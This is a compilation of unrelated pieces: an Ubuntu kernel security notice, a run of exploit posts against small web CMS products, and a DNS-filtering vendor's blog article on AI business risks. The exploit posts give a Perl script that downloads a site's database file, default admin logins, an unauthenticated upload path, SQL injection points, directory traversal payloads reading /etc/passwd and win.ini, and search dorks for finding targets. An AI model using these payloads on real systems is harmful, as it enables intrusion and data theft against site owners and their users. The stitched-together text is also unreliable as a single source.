Ubuntu Security Notice 6220-1 - Hangyu Hua discovered that the Flower classifier implementation in the Linux kernel contained an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that for some Intel processors the INVLPG instruction implementation did not properly flush global TLB entries when PCIDs are enabled. An attacker could use this to expose sensitive information or possibly cause undesired behaviors.

    ==========================================================================Ubuntu Security Notice USN-6220-1July 12, 2023linux-azure, linux-gcp, linux-ibm, linux-oracle vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-oracle: Linux kernel for Oracle Cloud systemsDetails:Hangyu Hua discovered that the Flower classifier implementation in theLinux kernel contained an out-of-bounds write vulnerability. An attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code.  (CVE-2023-35788, LP: #2023577)It was discovered that for some Intel processors the INVLPG instructionimplementation did not properly flush global TLB entries when PCIDs areenabled. An attacker could use this to expose sensitive information(kernel memory) or possibly cause undesired behaviors. (LP: #2023220)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   linux-image-6.2.0-1004-ibm      6.2.0-1004.4   linux-image-6.2.0-1006-azure    6.2.0-1006.6   linux-image-6.2.0-1006-oracle   6.2.0-1006.6   linux-image-6.2.0-1008-gcp      6.2.0-1008.8   linux-image-azure               6.2.0.1006.6   linux-image-gcp                 6.2.0.1008.8   linux-image-ibm                 6.2.0.1004.4   linux-image-oracle              6.2.0.1006.6After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6220-1   https://launchpad.net/bugs/2023220   https://launchpad.net/bugs/2023577   CVE-2023-35788Package Information:   https://launchpad.net/ubuntu/+source/linux-azure/6.2.0-1006.6   https://launchpad.net/ubuntu/+source/linux-gcp/6.2.0-1008.8   https://launchpad.net/ubuntu/+source/linux-ibm/6.2.0-1004.4   https://launchpad.net/ubuntu/+source/linux-oracle/6.2.0-1006.6

Ubuntu Security Notice USN-6220-1

Banner RotatorCMS version 1.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Banner RotatorCMS v1.0 Database Disclosure Exploit                                                                 |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://ToastForums.com                                                                                             |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# Banner RotatorCMS v1.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('Banner RotatorCMS v1.0 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="acart.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

Banner RotatorCMS 1.0 Database Disclosure

Avidi Media version 2.0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Avidi Media v2.0 - Ultimate Video, Music, Photo and Gif Sharing Script - nulled Insecure Settings Vulnerability    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/avidi-media-advanced-images-and-media-sharing-script/21944719                          |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] USe Payload : Login    : admin                  Password : admin123[+] http://127.0.0.1/mobimallaz/profile,admin====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Avidi Media 2.0 Insecure Settings

AtTestimonials CMS version 1.2 suffers from a missing authentication vulnerability.

    ====================================================================================================================================| # Title     : AtTestimonials CMS v1.2 Missing Authentication Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.dl.persianscript.ir/script/atmanager-system(PersianScript.ir).zip                                       || # Dork      : © Copyright 2009 : All Rights Reserved Programmed and Developed by themeflash.com                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to be missing authentication on the administrative interface[+] Use payload : /addnew.php[+] Add New Testimonials[+] http://wccpavingcouk/testimonials/addnew.php[+] Attach any file extension[+]  http://dfwcarfixcom/testimonials/upload/084145ahmad.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AtTestimonials CMS 1.2 Missing Authentication

Atom CMS version 2.0 suffers from a directory traversal vulnerability.

====================================================================================================================================  
| # Title     : AtomCMS 2.0 Directory traversal Vulnerability                                                                      |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            |  
| # Vendor    : https://github.com/thedigicraft/atomCMS/                                                                           |    
| # Dork      : Welcome to AtomCMS 2.0                                                                                             |  
====================================================================================================================================

poc :

[+]  Dorking İn Google Or Other Search Enggine .

[+]  Directory traversal :

     Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's  
   root directory.

   [+]  Affected items :

    /Atom/admin/   
    /Atom/admin/index.php 

  [+]  The impact of this vulnerability :

      By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories.  
    As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server.

[+]  How to fix this vulnerability :

     Your script should filter metacharacters from user input.

     Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.  
     This vulnerability affects /Atom/admin/. 

[+]  Attack details :

     URL encoded GET input page was set to unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\  
     File contents found:   
     ; for 16-bit app support

[+]  http://localhost/Atom/admin/?page=unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

====Greetings to :=========================================================================================================================  
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |  
===========================================================================================================================================

Atom CMS 2.0 Directory Traversal

Nedal CMS version 1.2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Nedal CMS 1.2 Sql injection vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.sanapix.com/                                                                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : link.asp?id=6 [+]  http://target_site/new/banner/link.asp?id=6 (inject her)====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Nedal CMS 1.2 SQL Injection

Asanhamayesh CMS version 3.4.6 suffers from a directory traversal vulnerability.

    =================================================================================================| # Title     : Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability                        || # Author    : indoushka                                                                       || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)         || # Dork      : طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس) ویرایش 3.4.6     |=================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /downloadfile.php?file=../../../../../../../../../../etc/passwd[+] http://127.0.0.1/itjdconfir/fa/downloadfile.php?file=../../../../../../../../../../etc/passwd====Greetings to :===================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |=====================================================================================================================================

Asanhamayesh CMS 3.4.6 Directory Traversal

ARTISTRY LIMITED LMS version 0.5 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : ARTISTRY LIMITED LMS v 0.5 Insecure Settings Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.artistrybd.net/                                                                                         |  | # Dork      : "Developed By ARTISTRY LIMITED"                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Appears to leave a default administrative account in place post installation.[+] Use Payload : user & pass = admin[+]  https://127.0.0.1/mother-earthnet/apanel/admin/index.php        ====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

ARTISTRY LIMITED LMS 0.5 Insecure Settings

Artificial intelligence (AI) holds immense potential for optimizing internal processes within businesses. However, it also comes with legitimate concerns regarding unauthorized use, including data loss risks and legal consequences. In this article, we will explore the risks associated with AI implementation and discuss measures to minimize damages. Additionally, we will examine regulatory

DNS Filtering / Network Security

Artificial intelligence (AI) holds immense potential for optimizing internal processes within businesses. However, it also comes with legitimate concerns regarding unauthorized use, including data loss risks and legal consequences. In this article, we will explore the risks associated with AI implementation and discuss measures to minimize damages. Additionally, we will examine regulatory initiatives by countries and ethical frameworks adopted by companies to regulate AI.

****Security risks********AI phishing attacks****

Cybercriminals can leverage AI in various ways to enhance their phishing attacks and increase their chances of success. Here are some ways AI can be exploited for phishing:

*   \- **Automated Phishing Campaigns:** AI-powered tools can automate the creation and dissemination of phishing emails on a large scale. These tools can generate convincing email content, craft personalized messages, and mimic the writing style of a specific individual, making phishing attempts appear more legitimate.

*   \- **Spear Phishing with Social Engineering:** AI can analyze vast amounts of publicly available data from social media, professional networks, or other sources to gather information about potential targets. This information can then be used to personalize phishing emails, making them highly tailored and difficult to distinguish from genuine communications.

*   **Natural Language Processing (NLP) Attacks:** AI-powered NLP algorithms can analyze and understand text, allowing cybercriminals to craft phishing emails that are contextually relevant and harder to detect by traditional email filters. These sophisticated attacks may bypass security measures designed to identify phishing attempts.

To mitigate the risks associated with AI-enhanced phishing attacks, organizations should adopt robust security measures. This includes employee training to recognize phishing attempts, implementation of multi-factor authentication, and leveraging AI-based solutions for detecting and defending against evolving phishing techniques. Employing **DNS filtering** as a first layer of protection can further enhance security.

****Regulation and legal risks****

With the rapid development of AI, laws, and regulations related to technology are still evolving. Regulation and legal risks associated with AI refer to the potential liabilities and legal consequences that businesses may face when implementing AI technology.

\- As AI becomes more prevalent, governments and regulators are starting to create laws and regulations that govern the use of the technology. Failure to comply with these laws and regulations can result in legal and financial penalties.

\- Liability for harms caused by AI systems: Businesses may be held liable for harms caused by their AI systems. For example, if an AI system makes a mistake that results in financial loss or harm to an individual, the business may be held liable.

\- Intellectual property disputes: Businesses may also face legal disputes related to intellectual property when developing and using AI systems. For example, disputes may arise over the ownership of the data used to train AI systems or over the ownership of the AI system itself.

****Countries and Companies Restricting AI********Regulatory Measures:****

Several countries are implementing or proposing regulations to address AI risks, aiming to protect privacy, ensure algorithmic transparency, and define ethical guidelines.

Examples: The European Union's General Data Protection Regulation (GDPR) establishes principles for AI systems' responsible data usage, while the proposed AI Act seeks to provide comprehensive rules for AI applications.

China has released AI-specific regulations, focusing on data security and algorithmic accountability, while the United States is engaged in ongoing discussions on AI governance.

****Corporate Initiatives:****

Many companies are taking proactive measures to govern AI usage responsibly and ethically, often through self-imposed restrictions and ethical frameworks.

Examples: Google's AI Principles emphasize the avoidance of bias, transparency, and accountability. Microsoft established the AI and Ethics in Engineering and Research (AETHER) Committee to guide responsible AI development. IBM developed the AI Fairness 360 toolkit to address bias and fairness in AI models.

****Conclusion.****

We strongly recommend implementing comprehensive protection systems and consulting with the legal department regarding the associated risks when utilizing AI. If the risks of using AI outweigh the benefits and your company's compliance guidelines advise against utilizing certain AI services in your workflow, you can block them using a **DNS filtering** service from SafeDNS. By doing so, you can mitigate the risks of data loss, maintain legal compliance, and adhere to internal company requirements.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Risks and Preventions of AI in Business: Safeguarding Against Potential Pitfalls

